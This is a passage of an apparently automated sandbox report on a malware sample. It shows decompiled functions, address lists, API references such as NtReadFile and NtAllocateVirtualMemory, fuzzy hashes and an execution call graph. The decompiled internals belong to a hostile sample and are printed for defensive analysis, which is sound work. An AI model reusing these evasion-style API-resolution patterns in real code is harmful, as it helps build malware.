							}
						}
						L9:
						return _t26;
					} else {
						return E00D7B058(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                        0x00d7a950
                        0x00d7a956
                        0x00d7a9c9
                        0x00000000
                        0x00d7a95d
                        0x00d7a95d
                        0x00d7a960
                        0x00d7a97b
                        0x00d7a97e
                        0x00d7a99e
                        0x00d7a9b0
                        0x00d7a980
                        0x00d7a980
                        0x00d7a983
                        0x00000000
                        0x00d7a985
                        0x00d7a997
                        0x00d7a997
                        0x00d7a983
                        0x00d7a9ce
                        0x00d7a9d2
                        0x00d7a962
                        0x00d7a97a
                        0x00d7a97a
                        0x00d7a960

                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.258065371.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000001.00000002.258059755.0000000000D70000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258092574.0000000000D83000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258098400.0000000000D87000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                        • String ID:
                        • API String ID: 3016257755-0
                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                        • Instruction ID: df75f856d7dfbd36c160b527e5f4905a5b81d0084c358f888a7a4154378a97b9
                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                        • Instruction Fuzzy Hash: DB014E3204024EFBCF125E98CC418EE3F22BB58354B9A8515FE1D58031E336C9B1AFA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00D75770 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 88%
                        			E00D75770(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v808;
				int _t9;
				intOrPtr _t14;
				signed int _t15;
				signed int _t17;
				signed int _t19;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr* _t30;
				intOrPtr* _t32;
				void* _t35;

				_t28 = __esi;
				_t27 = __edi;
				_t26 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t35 = _t23 -  *0xd83400; // 0xd4169297
				if(_t35 == 0) {
					asm("repe ret");
				}
				_t30 = _t32;
				_t9 = IsProcessorFeaturePresent(0x17);
				if(_t9 != 0) {
					_t23 = 2;
					asm("int 0x29");
				}
				 *0xd84e10 = _t9;
				 *0xd84e0c = _t23;
				 *0xd84e08 = _t26;
				 *0xd84e04 = _t22;
				 *0xd84e00 = _t28;
				 *0xd84dfc = _t27;
				 *0xd84e28 = ss;
				 *0xd84e1c = cs;
				 *0xd84df8 = ds;
				 *0xd84df4 = es;
				 *0xd84df0 = fs;
				 *0xd84dec = gs;
				asm("pushfd");
				_pop( *0xd84e20);
				 *0xd84e14 =  *_t30;
				 *0xd84e18 = _v0;
				 *0xd84e24 =  &_a4;
				 *0xd84d60 = 0x10001;
				_t14 =  *0xd84e18; // 0x0
				 *0xd84d1c = _t14;
				 *0xd84d10 = 0xc0000409;
				 *0xd84d14 = 1;
				 *0xd84d20 = 1;
				_t15 = 4;
				 *((intOrPtr*)(0xd84d24 + _t15 * 0)) = 2;
				_t17 = 4;
				_t24 =  *0xd83400; // 0xd4169297
				 *((intOrPtr*)(_t30 + _t17 * 0 - 8)) = _t24;
				_t19 = 4;
				_t25 =  *0xd83404; // 0x2be96d68
				 *((intOrPtr*)(_t30 + (_t19 << 0) - 8)) = _t25;
				return E00D77A95(_t19 << 0, 0xd814c4);
			}




















                        0x00d75770
                        0x00d75770
                        0x00d75770
                        0x00d75770
                        0x00d75770
                        0x00d75770
                        0x00d75776
                        0x00d75778
                        0x00d75778
                        0x00d77ad3
                        0x00d77add
                        0x00d77ae4
                        0x00d77ae8
                        0x00d77ae9
                        0x00d77ae9
                        0x00d77aeb
                        0x00d77af0
                        0x00d77af6
                        0x00d77afc
                        0x00d77b02
                        0x00d77b08
                        0x00d77b0e
                        0x00d77b15
                        0x00d77b1c
                        0x00d77b23
                        0x00d77b2a
                        0x00d77b31
                        0x00d77b38
                        0x00d77b39
                        0x00d77b42
                        0x00d77b4a
                        0x00d77b52
                        0x00d77b5d
                        0x00d77b67
                        0x00d77b6c
                        0x00d77b71
                        0x00d77b7b
                        0x00d77b85
                        0x00d77b91
                        0x00d77b95
                        0x00d77ba1
                        0x00d77ba5
                        0x00d77bab
                        0x00d77bb1
                        0x00d77bb5
                        0x00d77bbb
                        0x00d77bcc

                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D77ADD
                        • ___raise_securityfailure.LIBCMT ref: 00D77BC4
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.258065371.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000001.00000002.258059755.0000000000D70000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258092574.0000000000D83000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258098400.0000000000D87000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: FeaturePresentProcessor___raise_securityfailure
                        • String ID: hm+
                        • API String ID: 3761405300-2299420318
                        • Opcode ID: 14d81bc0a12dcdff91eb8cf61112a0fc1171a9fc7176278a0bb2f844975fb062
                        • Instruction ID: 5115c36652394d228fd4630e33bcf750dfabab23ae248369d7c4adfe625c20ac
                        • Opcode Fuzzy Hash: 14d81bc0a12dcdff91eb8cf61112a0fc1171a9fc7176278a0bb2f844975fb062
                        • Instruction Fuzzy Hash: 8A211FB5560306DBE712DF18F942A007BE8FB08310F10842AF908CB3A1E3B05A818FB9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:5.8%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:3.9%
                        Total number of Nodes:533
                        Total number of Limit Nodes:68
                        execution_graph 23156 41f060 23159 41b930 23156->23159 23160 41b956 23159->23160 23167 409d30 23160->23167 23162 41b962 23166 41b983 23162->23166 23175 40c1b0 23162->23175 23164 41b975 23211 41a670 23164->23211 23168 409d3d 23167->23168 23215 409c80 23167->23215 23170 409d44 23168->23170 23227 409c20 23168->23227 23170->23162 23176 40c1d5 23175->23176 23634 40b1b0 23176->23634 23178 40c22c 23638 40ae30 23178->23638 23180 40c4a3 23180->23164 23181 40c252 23181->23180 23647 414390 23181->23647 23183 40c297 23183->23180 23650 408a60 23183->23650 23185 40c2db 23185->23180 23657 41a4c0 23185->23657 23189 40c331 23190 40c338 23189->23190 23668 419fd0 23189->23668 23191 41bd80 2 API calls 23190->23191 23193 40c345 23191->23193 23193->23164 23195 40c382 23196 41bd80 2 API calls 23195->23196 23197 40c389 23196->23197 23197->23164 23198 40c392 23199 40f490 LdrLoadDll 23198->23199 23200 40c406 23199->23200 23200->23190 23201 40c411 23200->23201 23202 41bd80 2 API calls 23201->23202 23203 40c435 23202->23203 23672 41a020 23203->23672 23206 419fd0 LdrLoadDll 23207 40c470 23206->23207 23207->23180 23675 419de0 23207->23675 23210 41a670 2 API calls 23210->23180 23212 41a682 23211->23212 23213 41af20 LdrLoadDll 23212->23213 23214 41a68f ExitProcess 23213->23214 23214->23166 23246 418b80 23215->23246 23219 409ca6 23219->23168 23220 409c9c 23220->23219 23253 41b270 23220->23253 23222 409ce3 23222->23219 23264 409aa0 23222->23264 23224 409d03 23270 409620 LdrLoadDll 23224->23270 23226 409d15 23226->23168 23228 409c3a 23227->23228 23229 41b560 LdrLoadDll 23227->23229 23610 41b560 23228->23610 23229->23228 23232 41b560 LdrLoadDll 23233 409c61 23232->23233 23234 40f170 23233->23234 23235 40f189 23234->23235 23619 40b030 23235->23619 23237 40f19c 23623 41a1a0 23237->23623 23241 40f1c2 23245 40f1ed 23241->23245 23630 41a220 23241->23630 23242 41a450 2 API calls 23244 409d55 23242->23244 23244->23162 23245->23242 23247 418b8f 23246->23247 23271 414e40 23247->23271 23249 409c93 23250 418a30 23249->23250 23277 41a5c0 23250->23277 23254 41b289 23253->23254 23284 414a40 23254->23284 23256 41b2a1 23257 41b2aa 23256->23257 23323 41b0b0 23256->23323 23257->23222 23259 41b2be 23259->23257 23341 419ec0 23259->23341 23267 409aba 23264->23267 23591 407ea0 23264->23591 23266 409ac1 23266->23224 23267->23266 23604 408160 23267->23604 23270->23226 23272 414e5a 23271->23272 23273 414e4e 23271->23273 23272->23249 23273->23272 23276 4152c0 LdrLoadDll 23273->23276 23275 414fac 23275->23249 23276->23275 23280 41af20 23277->23280 23279 418a45 23279->23220 23281 41af30 23280->23281 23283 41af52 23280->23283 23282 414e40 LdrLoadDll 23281->23282 23282->23283 23283->23279 23285 414d75 23284->23285 23286 414a54 23284->23286 23285->23256 23286->23285 23347 419c10 23286->23347 23289 414b80 23350 41a320 23289->23350 23290 414b63 23407 41a420 LdrLoadDll 23290->23407 23293 414b6d 23293->23256 23294 414ba7 23295 41bd80 2 API calls 23294->23295 23297 414bb3 23295->23297 23296 414d39 23299 41a450 2 API calls 23296->23299 23297->23293 23297->23296 23298 414d4f 23297->23298 23303 414c42 23297->23303 23416 414780 LdrLoadDll NtReadFile NtClose 23298->23416 23300 414d40 23299->23300 23300->23256 23302 414d62 23302->23256 23304 414ca9 23303->23304 23306 414c51 23303->23306 23304->23296 23305 414cbc 23304->23305 23409 41a2a0 23305->23409 23307 414c56 23306->23307 23308 414c6a 23306->23308 23408 414640 LdrLoadDll NtClose 23307->23408 23311 414c87 23308->23311 23312 414c6f 23308->23312 23311->23300 23365 414400 23311->23365 23353 4146e0 23312->23353 23315 414c60 23315->23256 23317 414d1c 23413 41a450 23317->23413 23318 414c7d 23318->23256 23321 414c9f 23321->23256 23322 414d28 23322->23256 23324 41b0c1 23323->23324 23325 41b0d3 23324->23325 23434 41bd00 23324->23434 23325->23259 23327 41b0f4 23437 414060 23327->23437 23329 41b140 23329->23259 23330 41b117 23330->23329 23331 414060 3 API calls 23330->23331 23332 41b139 23331->23332 23332->23329 23469 415380 23332->23469 23334 41b1ca 23336 41b1da 23334->23336 23561 41aec0 LdrLoadDll 23334->23561 23479 41ad30 23336->23479 23338 41b208 23558 419e80 23338->23558 23342 41af20 LdrLoadDll 23341->23342 23343 419edc 23342->23343 23344 41bd80 23343->23344 23588 41a630 23344->23588 23346 41b319 23346->23222 23348 41af20 LdrLoadDll 23347->23348 23349 414b34 23348->23349 23349->23289 23349->23290 23349->23293 23351 41a33c NtCreateFile 23350->23351 23352 41af20 LdrLoadDll 23350->23352 23351->23294 23352->23351 23354 4146fc 23353->23354 23355 41a2a0 LdrLoadDll 23354->23355 23356 41471d 23355->23356 23357 414724 23356->23357 23358 414738 23356->23358 23360 41a450 2 API calls 23357->23360 23359 41a450 2 API calls 23358->23359 23361 414741 23359->23361 23362 41472d 23360->23362 23417 41bf90 LdrLoadDll RtlAllocateHeap 23361->23417 23362->23318 23364 41474c 23364->23318 23366 41444b 23365->23366 23369 41447e 23365->23369 23367 41a2a0 LdrLoadDll 23366->23367 23370 414466 23367->23370 23368 4145c9 23371 41a2a0 LdrLoadDll 23368->23371 23369->23368 23373 41449a 23369->23373 23372 41a450 2 API calls 23370->23372 23377 4145e4 23371->23377 23374 41446f 23372->23374 23375 41a2a0 LdrLoadDll 23373->23375 23374->23321 23376 4144b5 23375->23376 23379 4144d1 23376->23379 23380 4144bc 23376->23380 23430 41a2e0 LdrLoadDll 23377->23430 23381 4144d6 23379->23381 23382 4144ec 23379->23382 23384 41a450 2 API calls 23380->23384 23386 41a450 2 API calls 23381->23386 23393 4144f1 23382->23393 23418 41bf50 23382->23418 23383 41461e 23387 41a450 2 API calls 23383->23387 23385 4144c5 23384->23385 23385->23321 23389 4144df 23386->23389 23388 414629 23387->23388 23388->23321 23389->23321 23392 414557 23394 41456e 23392->23394 23429 41a260 LdrLoadDll 23392->23429 23400 414503 23393->23400 23421 41a3d0 23393->23421 23396 414575 23394->23396 23397 41458a 23394->23397 23398 41a450 2 API calls 23396->23398 23399 41a450 2 API calls 23397->23399 23398->23400 23401 414593 23399->23401 23400->23321 23402 4145bf 23401->23402 23424 41bb50 23401->23424 23402->23321 23404 4145aa 23405 41bd80 2 API calls 23404->23405 23406 4145b3 23405->23406 23406->23321 23407->23293 23408->23315 23410 41af20 LdrLoadDll 23409->23410 23411 414d04 23410->23411 23412 41a2e0 LdrLoadDll 23411->23412 23412->23317 23414 41af20 LdrLoadDll 23413->23414 23415 41a46c NtClose 23414->23415 23415->23322 23416->23302 23417->23364 23431 41a5f0 23418->23431 23420 41bf68 23420->23393 23422 41a3ec NtReadFile 23421->23422 23423 41af20 LdrLoadDll 23421->23423 23422->23392 23423->23422 23425 41bb74 23424->23425 23426 41bb5d 23424->23426 23425->23404 23426->23425 23427 41bf50 2 API calls 23426->23427 23428 41bb8b 23427->23428 23428->23404 23429->23394 23430->23383 23432 41af20 LdrLoadDll 23431->23432 23433 41a60c RtlAllocateHeap 23432->23433 23433->23420 23435 41bd2d 23434->23435 23562 41a500 23434->23562 23435->23327 23438 414071 23437->23438 23440 414079 23437->23440 23438->23330 23439 41434c 23439->23330 23440->23439 23565 41cef0 23440->23565 23442 4140cd 23443 41cef0 2 API calls 23442->23443 23446 4140d8 23443->23446 23444 414126 23447 41cef0 2 API calls 23444->23447 23446->23444 23448 41d020 3 API calls 23446->23448 23576 41cf90 LdrLoadDll RtlAllocateHeap RtlFreeHeap 23446->23576 23450 41413a 23447->23450 23448->23446 23449 414197 23451 41cef0 2 API calls 23449->23451 23450->23449 23570 41d020 23450->23570 23453 4141ad 23451->23453 23454 4141ea 23453->23454 23457 41d020 3 API calls 23453->23457 23455 41cef0 2 API calls 23454->23455 23456 4141f5 23455->23456 23458 41d020 3 API calls 23456->23458 23464 41422f 23456->23464 23457->23453 23458->23456 23460 414324 23578 41cf50 LdrLoadDll RtlFreeHeap 23460->23578 23462 41432e 23579 41cf50 LdrLoadDll RtlFreeHeap 23462->23579 23577 41cf50 LdrLoadDll RtlFreeHeap 23464->23577 23465 414338 23580 41cf50 LdrLoadDll RtlFreeHeap 23465->23580 23467 414342 23581 41cf50 LdrLoadDll RtlFreeHeap 23467->23581 23470 415391 23469->23470 23471 414a40 6 API calls 23470->23471 23473 4153a7 23471->23473 23472 4153fa 23472->23334 23473->23472 23474 4153e2 23473->23474 23475 4153f5 23473->23475 23477 41bd80 2 API calls 23474->23477 23476 41bd80 2 API calls 23475->23476 23476->23472 23478 4153e7 23477->23478 23478->23334 23480 41ad44 23479->23480 23481 41abf0 LdrLoadDll 23479->23481 23582 41abf0 23480->23582 23481->23480 23483 41ad4d 23484 41abf0 LdrLoadDll 23483->23484 23485 41ad56 23484->23485 23486 41abf0 LdrLoadDll 23485->23486 23487 41ad5f 23486->23487 23488 41abf0 LdrLoadDll 23487->23488 23489 41ad68 23488->23489 23490 41abf0 LdrLoadDll 23489->23490 23491 41ad71 23490->23491 23492 41abf0 LdrLoadDll 23491->23492 23493 41ad7d 23492->23493 23494 41abf0 LdrLoadDll 23493->23494 23495 41ad86 23494->23495 23496 41abf0 LdrLoadDll 23495->23496 23497 41ad8f 23496->23497 23498 41abf0 LdrLoadDll 23497->23498 23499 41ad98 23498->23499 23500 41abf0 LdrLoadDll 23499->23500 23501 41ada1 23500->23501 23502 41abf0 LdrLoadDll 23501->23502 23503 41adaa 23502->23503 23504 41abf0 LdrLoadDll 23503->23504 23505 41adb6 23504->23505 23506 41abf0 LdrLoadDll 23505->23506 23507 41adbf 23506->23507 23508 41abf0 LdrLoadDll 23507->23508 23509 41adc8 23508->23509 23510 41abf0 LdrLoadDll 23509->23510 23511 41add1 23510->23511 23512 41abf0 LdrLoadDll 23511->23512 23513 41adda 23512->23513 23514 41abf0 LdrLoadDll 23513->23514 23515 41ade3 23514->23515 23516 41abf0 LdrLoadDll 23515->23516 23517 41adef 23516->23517 23518 41abf0 LdrLoadDll 23517->23518 23519 41adf8 23518->23519 23520 41abf0 LdrLoadDll 23519->23520 23521 41ae01 23520->23521 23522 41abf0 LdrLoadDll 23521->23522 23523 41ae0a 23522->23523 23524 41abf0 LdrLoadDll 23523->23524 23525 41ae13 23524->23525 23526 41abf0 LdrLoadDll 23525->23526 23527 41ae1c 23526->23527 23528 41abf0 LdrLoadDll 23527->23528 23529 41ae28 23528->23529 23530 41abf0 LdrLoadDll 23529->23530 23531 41ae31 23530->23531 23532 41abf0 LdrLoadDll 23531->23532 23533 41ae3a 23532->23533 23534 41abf0 LdrLoadDll 23533->23534 23535 41ae43 23534->23535 23536 41abf0 LdrLoadDll 23535->23536 23537 41ae4c 23536->23537 23538 41abf0 LdrLoadDll 23537->23538 23539 41ae55 23538->23539 23540 41abf0 LdrLoadDll 23539->23540 23541 41ae61 23540->23541 23542 41abf0 LdrLoadDll 23541->23542 23543 41ae6a 23542->23543 23544 41abf0 LdrLoadDll 23543->23544 23545 41ae73 23544->23545 23546 41abf0 LdrLoadDll 23545->23546 23547 41ae7c 23546->23547 23548 41abf0 LdrLoadDll 23547->23548 23549 41ae85 23548->23549 23550 41abf0 LdrLoadDll 23549->23550 23551 41ae8e 23550->23551 23552 41abf0 LdrLoadDll 23551->23552 23553 41ae9a 23552->23553 23554 41abf0 LdrLoadDll 23553->23554 23555 41aea3 23554->23555 23556 41abf0 LdrLoadDll 23555->23556 23557 41aeac 23556->23557 23557->23338 23559 41af20 LdrLoadDll 23558->23559 23560 419e9c 23559->23560 23560->23259 23561->23336 23563 41a51c NtAllocateVirtualMemory 23562->23563 23564 41af20 LdrLoadDll 23562->23564 23563->23435 23564->23563 23566 41cf00 23565->23566 23567 41cf06 23565->23567 23566->23442 23568 41bf50 2 API calls 23567->23568 23569 41cf2c 23568->23569 23569->23442 23571 41cf90 23570->23571 23572 41cfed 23571->23572 23573 41bf50 2 API calls 23571->23573 23572->23450 23574 41cfca 23573->23574 23574->23572 23575 41bd80 2 API calls 23574->23575 23575->23572 23576->23446 23577->23460 23578->23462 23579->23465 23580->23467 23581->23439 23583 41ac0b 23582->23583 23584 414e40 LdrLoadDll 23583->23584 23585 41ac2b 23584->23585 23586 414e40 LdrLoadDll 23585->23586 23587 41acd7 23585->23587 23586->23587 23587->23483 23587->23587 23589 41a64c RtlFreeHeap 23588->23589 23590 41af20 LdrLoadDll 23588->23590 23589->23346 23590->23589 23592 407eb0 23591->23592 23593 407eab 23591->23593 23594 41bd00 2 API calls 23592->23594 23593->23267 23595 407ed5 23594->23595 23596 407f38 23595->23596 23597 419e80 LdrLoadDll 23595->23597 23598 407f3e 23595->23598 23602 41bd00 2 API calls 23595->23602 23607 41a580 23595->23607 23596->23267 23597->23595 23600 407f64 23598->23600 23601 41a580 LdrLoadDll 23598->23601 23600->23267 23603 407f55 23601->23603 23602->23595 23603->23267 23605 41a580 LdrLoadDll 23604->23605 23606 40817e 23605->23606 23606->23224 23608 41af20 LdrLoadDll 23607->23608 23609 41a59c 23608->23609 23609->23595 23611 41b583 23610->23611 23614 40ace0 23611->23614 23613 409c4b 23613->23232 23616 40ad04 23614->23616 23615 40ad0b 23615->23613 23616->23615 23617 40ad40 LdrLoadDll 23616->23617 23618 40ad57 23616->23618 23617->23618 23618->23613 23621 40b053 23619->23621 23620 40b0d0 23620->23237 23621->23620 23633 419c50 LdrLoadDll 23621->23633 23624 41af20 LdrLoadDll 23623->23624 23625 40f1ab 23624->23625 23625->23244 23626 41a790 23625->23626 23627 41af20 LdrLoadDll 23626->23627 23628 41a7af LookupPrivilegeValueW 23627->23628 23628->23241 23631 41a23c 23630->23631 23632 41af20 LdrLoadDll 23630->23632 23631->23245 23632->23631 23633->23620 23635 40b1e0 23634->23635 23636 40b030 LdrLoadDll 23635->23636 23637 40b1f4 23636->23637 23637->23178 23639 40ae41 23638->23639 23640 40ae3d 23638->23640 23641 40ae8c 23639->23641 23642 40ae5a 23639->23642 23640->23181 23679 419c90 LdrLoadDll 23641->23679 23678 419c90 LdrLoadDll 23642->23678 23644 40ae9d 23644->23181 23646 40ae7c 23646->23181 23648 40f490 LdrLoadDll 23647->23648 23649 4143b6 23647->23649 23648->23649 23649->23183 23680 4087a0 23650->23680 23653 4087a0 8 API calls 23654 408a8a 23653->23654 23656 408a9d 23654->23656 23698 40f700 6 API calls 23654->23698 23656->23185 23658 41a4d6 23657->23658 23659 41af20 LdrLoadDll 23658->23659 23660 40c312 23659->23660 23661 40f490 23660->23661 23662 40f4ad 23661->23662 23808 419f80 23662->23808 23665 40f4f5 23665->23189 23666 419fd0 LdrLoadDll 23667 40f51e 23666->23667 23667->23189 23669 419fd6 23668->23669 23670 41af20 LdrLoadDll 23669->23670 23671 40c375 23670->23671 23671->23195 23671->23198 23673 41af20 LdrLoadDll 23672->23673 23674 40c449 23673->23674 23674->23206 23676 41af20 LdrLoadDll 23675->23676 23677 40c49c 23676->23677 23677->23210 23678->23646 23679->23644 23681 407ea0 2 API calls 23680->23681 23693 4087ba 23680->23693 23681->23693 23682 408a49 23682->23653 23682->23656 23683 408a3f 23684 408160 LdrLoadDll 23683->23684 23684->23682 23687 419ec0 LdrLoadDll 23687->23693 23691 40c4b0 LdrLoadDll NtClose 23691->23693 23693->23682 23693->23683 23693->23687 23693->23691 23695 419de0 LdrLoadDll 23693->23695 23696 41a450 LdrLoadDll NtClose 23693->23696 23699 419cd0 23693->23699 23702 4085d0 23693->23702 23714 40f5e0 LdrLoadDll NtClose 23693->23714 23715 419d50 LdrLoadDll 23693->23715 23716 419d80 LdrLoadDll 23693->23716 23717 419e10 LdrLoadDll 23693->23717 23718 4083a0 23693->23718 23734 405f60 LdrLoadDll 23693->23734 23695->23693 23696->23693 23698->23656 23700 41af20 LdrLoadDll 23699->23700 23701 419cec 23700->23701 23701->23693 23703 4085e6 23702->23703 23735 419840 23703->23735 23705 4085ff 23710 408771 23705->23710 23756 4081a0 23705->23756 23707 4086e5 23708 4083a0 7 API calls 23707->23708 23707->23710 23709 408713 23708->23709 23709->23710 23711 419ec0 LdrLoadDll 23709->23711 23710->23693 23712 408748 23711->23712 23712->23710 23713 41a4c0 LdrLoadDll 23712->23713 23713->23710 23714->23693 23715->23693 23716->23693 23717->23693 23719 4083c9 23718->23719 23790 408310 23719->23790 23722 41a4c0 LdrLoadDll 23723 4083dc 23722->23723 23723->23722 23724 408467 23723->23724 23727 408462 23723->23727 23798 40f660 23723->23798 23724->23693 23725 41a450 2 API calls 23726 40849a 23725->23726 23726->23724 23728 419cd0 LdrLoadDll 23726->23728 23727->23725 23729 4084ff 23728->23729 23729->23724 23802 419d10 23729->23802 23731 408563 23731->23724 23732 414a40 6 API calls 23731->23732 23733 4085b8 23732->23733 23733->23693 23734->23693 23736 41bf50 2 API calls 23735->23736 23737 419857 23736->23737 23763 409310 23737->23763 23739 419872 23740 4198b0 23739->23740 23741 419899 23739->23741 23744 41bd00 2 API calls 23740->23744 23742 41bd80 2 API calls 23741->23742 23743 4198a6 23742->23743 23743->23705 23745 4198ea 23744->23745 23746 41bd00 2 API calls 23745->23746 23747 419903 23746->23747 23753 419ba4 23747->23753 23769 41bd40 23747->23769 23750 419b90 23751 41bd80 2 API calls 23750->23751 23752 419b9a 23751->23752 23752->23705 23754 41bd80 2 API calls 23753->23754 23755 419bf9 23754->23755 23755->23705 23757 4081b5 23756->23757 23758 40829f 23756->23758 23757->23758 23759 414a40 6 API calls 23757->23759 23758->23707 23760 408222 23759->23760 23761 41bd80 2 API calls 23760->23761 23762 408249 23760->23762 23761->23762 23762->23707 23764 409335 23763->23764 23765 40ace0 LdrLoadDll 23764->23765 23766 409368 23765->23766 23768 40938d 23766->23768 23772 40cf10 23766->23772 23768->23739 23787 41a540 23769->23787 23773 40cf3c 23772->23773 23774 41a1a0 LdrLoadDll 23773->23774 23775 40cf55 23774->23775 23776 40cf5c 23775->23776 23783 41a1e0 23775->23783 23776->23768 23780 40cf97 23781 41a450 2 API calls 23780->23781 23782 40cfba 23781->23782 23782->23768 23784 41af20 LdrLoadDll 23783->23784 23785 40cf7f 23784->23785 23785->23776 23786 41a7d0 LdrLoadDll 23785->23786 23786->23780 23788 41af20 LdrLoadDll 23787->23788 23789 419b89 23788->23789 23789->23750 23789->23753 23791 408328 23790->23791 23792 40ace0 LdrLoadDll 23791->23792 23793 408343 23792->23793 23794 414e40 LdrLoadDll 23793->23794 23795 408353 23794->23795 23796 40835c PostThreadMessageW 23795->23796 23797 408370 23795->23797 23796->23797 23797->23723 23799 40f673 23798->23799 23805 419e50 23799->23805 23803 41af20 LdrLoadDll 23802->23803 23804 419d2c 23803->23804 23804->23731 23806 41af20 LdrLoadDll 23805->23806 23807 40f69e 23805->23807 23806->23807 23807->23723 23809 40f4ee 23808->23809 23810 41af20 LdrLoadDll 23808->23810 23809->23665 23809->23666 23810->23809

                        Executed Functions

                        Function 0041A3CE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37filenativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 41a3ce-41a419 call 41af20 NtReadFile
                        C-Code - Quality: 23%
                        			E0041A3CE(void* __eax, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, char _a28, intOrPtr _a32, char _a36) {
				intOrPtr _v0;
				void* _t19;
				void* _t28;
				void* _t29;
				intOrPtr* _t30;
				void* _t32;

				asm("aad 0x55");
				_t14 = _v0;
				_t30 = _v0 + 0xc48;
				E0041AF20(_t28, _t14, _t30,  *((intOrPtr*)(_t14 + 0x10)), 0, 0x2a);
				_t4 =  &_a36; // 0x414a21
				_t6 =  &_a28; // 0x414d62
				_t12 =  &_a4; // 0x414d62
				_t19 =  *((intOrPtr*)( *_t30))( *_t12, _a8, _a12, _a16, _a20, _a24,  *_t6, _a32,  *_t4, _t29, _t32, __eax); // executed
				return _t19;
			}









                        0x0041a3cf
                        0x0041a3d3
                        0x0041a3df
                        0x0041a3e7
                        0x0041a3ec
                        0x0041a3f2
                        0x0041a40d
                        0x0041a415
                        0x0041a419

                        APIs
                        • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileRead
                        • String ID: !JA$bMA$bMA
                        • API String ID: 2738559852-4222312340
                        • Opcode ID: fe205197a1c041c32c5dc87a2d977c2ecf48653b698c8e2162f2cada97e5132b
                        • Instruction ID: 2b59cacd985905e6d9ebe9db6352663ad52ddf4b88a6e3b9a0d282aa9568fefa
                        • Opcode Fuzzy Hash: fe205197a1c041c32c5dc87a2d977c2ecf48653b698c8e2162f2cada97e5132b
                        • Instruction Fuzzy Hash: 1FF0A4B2200108ABCB14DF89DC81EEB77ADAF8C754F158649BE1DA7251D634E9518BA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0041A3D0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 3 41a3d0-41a3e6 4 41a3ec-41a419 NtReadFile 3->4 5 41a3e7 call 41af20 3->5 5->4
                        C-Code - Quality: 37%
                        			E0041A3D0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AF20(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x414a21
				_t6 =  &_a32; // 0x414d62
				_t12 =  &_a8; // 0x414d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                        0x0041a3d3
                        0x0041a3df
                        0x0041a3e7
                        0x0041a3ec
                        0x0041a3f2
                        0x0041a40d
                        0x0041a415
                        0x0041a419

                        APIs
                        • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileRead
                        • String ID: !JA$bMA$bMA
